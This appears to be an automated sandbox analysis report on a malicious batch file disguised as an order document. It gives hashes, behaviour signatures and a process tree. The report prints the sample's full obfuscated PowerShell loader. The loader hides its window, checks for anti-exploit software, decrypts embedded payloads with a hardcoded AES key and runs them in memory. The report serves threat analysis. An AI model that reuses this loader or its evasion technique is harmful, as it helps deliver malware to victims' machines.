Analysis
-
max time kernel
17s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09-08-2024 12:03
Static task
static1
Behavioral task
behavioral1
Sample
New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd
Resource
win7-20240729-en
windows7-x64
3 signatures
150 seconds
General
-
Target
New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd
-
Size
67KB
-
MD5
25927e296d192c57b87be2b7c08b9217
-
SHA1
a87d3ee507f615fbdd785beab75834de6ca8278a
-
SHA256
ac9a63cffda7c69820207e8f51ed0a0d24f77d5f81600ccd56406790ca6f5c83
-
SHA512
4c3606a2868f2ea0ddbc4a450614ccbd3f6a8bd649e6a797e8dbcab2e679bdbf2024f6722012431f9687109670a98e9b2e7d878e30fa0372a3531bf2ea3bbd97
-
SSDEEP
1536:tXUTAKUXpetG7GvuGSERPZSnw22B1Tkn0v:tETvUXpI/GuH2BM
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2512 2416 cmd.exe 30 PID 2416 wrote to memory of 2512 2416 cmd.exe 30 PID 2416 wrote to memory of 2512 2416 cmd.exe 30 PID 2416 wrote to memory of 2260 2416 cmd.exe 31 PID 2416 wrote to memory of 2260 2416 cmd.exe 31 PID 2416 wrote to memory of 2260 2416 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\New-Order#2819_381918_391733_3793_399173_509463_57165_509725.cmd';$fqwe='ReaABYRdLABYRinABYResABYR'.Replace('ABYR', ''),'Snkxapnkxalitnkxa'.Replace('nkxa', ''),'EleokkrmeokkrntAokkrtokkr'.Replace('okkr', ''),'EECoHntECoHrECoHyPoECoHiECoHnECoHtECoH'.Replace('ECoH', ''),'GtwLSettwLSCutwLSrtwLSretwLSntwLSttwLSPrtwLSocetwLSsstwLS'.Replace('twLS', ''),'TVMDwrVMDwaVMDwnsVMDwforVMDwmFiVMDwnaVMDwlBlVMDwocVMDwkVMDw'.Replace('VMDw', ''),'IpWzDnvpWzDopWzDkpWzDepWzD'.Replace('pWzD', ''),'FrJxKhomBJxKhaJxKhseJxKh64SJxKhtJxKhriJxKhnJxKhgJxKh'.Replace('JxKh', ''),'Loiohfadiohf'.Replace('iohf', ''),'DeZgWdcoZgWdmpZgWdrZgWdeZgWdsZgWdsZgWd'.Replace('ZgWd', ''),'ChautuynutuygeEutuyxutuyteutuynsiutuyoutuynutuy'.Replace('utuy', ''),'MaMBRyiMBRynMMBRyoduMBRyleMBRy'.Replace('MBRy', ''),'CraUNKeaaUNKtaUNKeDaUNKecaUNKraUNKypaUNKtoaUNKraUNK'.Replace('aUNK', ''),'CXDFCoXDFCpXDFCyToXDFC'.Replace('XDFC', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($fqwe[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function RyEJM($bZGlf){$dAgOT=[System.Security.Cryptography.Aes]::Create();$dAgOT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dAgOT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dAgOT.Key=[System.Convert]::($fqwe[7])('hgNXz1fD3vm3S5F/rkSDGMdYKv7gk2P2ZQChO5e/6Co=');$dAgOT.IV=[System.Convert]::($fqwe[7])('Md9mUVXJ/X1tjxSRFOzmPA==');$lxUOE=$dAgOT.($fqwe[12])();$vusSA=$lxUOE.($fqwe[5])($bZGlf,0,$bZGlf.Length);$lxUOE.Dispose();$dAgOT.Dispose();$vusSA;}function cACUf($bZGlf){$rDMwq=New-Object System.IO.MemoryStream(,$bZGlf);$HiJuv=New-Object System.IO.MemoryStream;$Iropi=New-Object System.IO.Compression.GZipStream($rDMwq,[IO.Compression.CompressionMode]::($fqwe[9]));$Iropi.($fqwe[13])($HiJuv);$Iropi.Dispose();$rDMwq.Dispose();$HiJuv.Dispose();$HiJuv.ToArray();}$KEDOk=[System.IO.File]::($fqwe[0])([Console]::Title);$FSBau=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 5).Substring(2))));$AbKCR=cACUf (RyEJM ([Convert]::($fqwe[7])([System.Linq.Enumerable]::($fqwe[2])($KEDOk, 6).Substring(2))));[System.Reflection.Assembly]::($fqwe[8])([byte[]]$AbKCR).($fqwe[3]).($fqwe[6])($null,$null);[System.Reflection.Assembly]::($fqwe[8])([byte[]]$FSBau).($fqwe[3]).($fqwe[6])($null,$null); "2⤵PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-